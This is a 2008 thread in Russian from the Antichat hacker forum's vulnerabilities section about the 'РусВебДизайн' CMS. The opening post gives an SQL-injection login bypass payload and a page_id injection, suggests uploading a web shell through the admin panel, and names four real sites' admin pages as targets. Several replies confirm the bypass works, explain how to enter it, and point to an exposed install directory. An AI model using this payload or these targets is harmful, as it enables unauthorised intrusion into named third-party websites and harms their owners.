Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Дырявая «cms РусВебДизайн» (https://forum.antichat.xyz/showthread.php?t=80463)

mailbrush 11.08.2008 13:07

Дырявая «cms РусВебДизайн»
 
Пример того, как не стоит делать CMS.
Офф. сайт - http://ruswebdesign.ru/, причем у них эта CMS не стоит, боятся видимо юзать.

Пример: http://www.alpgalka.ru/admin/
Достаточно ввести в поле логин ' or 1/* и нажать Войти. В админке очень удобно загружать шелл.
Ну и sql-инъекции типа http://www.alpgalka.ru/?page_id=4'

http://www.microplasma.ru/admin/
http://www.akabel.ru/admin/
http://www.eurovolga.ru/admin/

© xaker.name

luz3r 11.08.2008 16:32

кул уязвимость!!! + =)

Don Anton 11.08.2008 16:40

Копирайты поставь) А то все думают, что это ты нашёл)))

fly 11.08.2008 18:13

+1 Don Anton

DDoSька 11.08.2008 22:32

чет я пробовал,логин admin ,эту фичу,но не робит,скорее всего у меня руки кривые
------------------------------
Я ж говорил,что я кривой,надо мне по больше спать =)

NApoleonchik 11.08.2008 23:18

ку
 
все работает) автору +

TheJahte 11.08.2008 23:56

Прямо говорю )) Дибилы писали xD

luz3r 12.08.2008 00:06

Цитата:

Сообщение от DDoSька
чет я пробовал,логин admin ,эту фичу,но не робит,скорее всего у меня руки кривые

В логине пишеш - ' or 1/ * , пасс остовляеш пустым =)

TheJahte 12.08.2008 00:19

Таверна Античат xDDDDDDDD бля... кто так жестко отжоГ ?

TheJahte 12.08.2008 00:28

http://www.alpgalka.ru/__install/ псц


Время: 12:33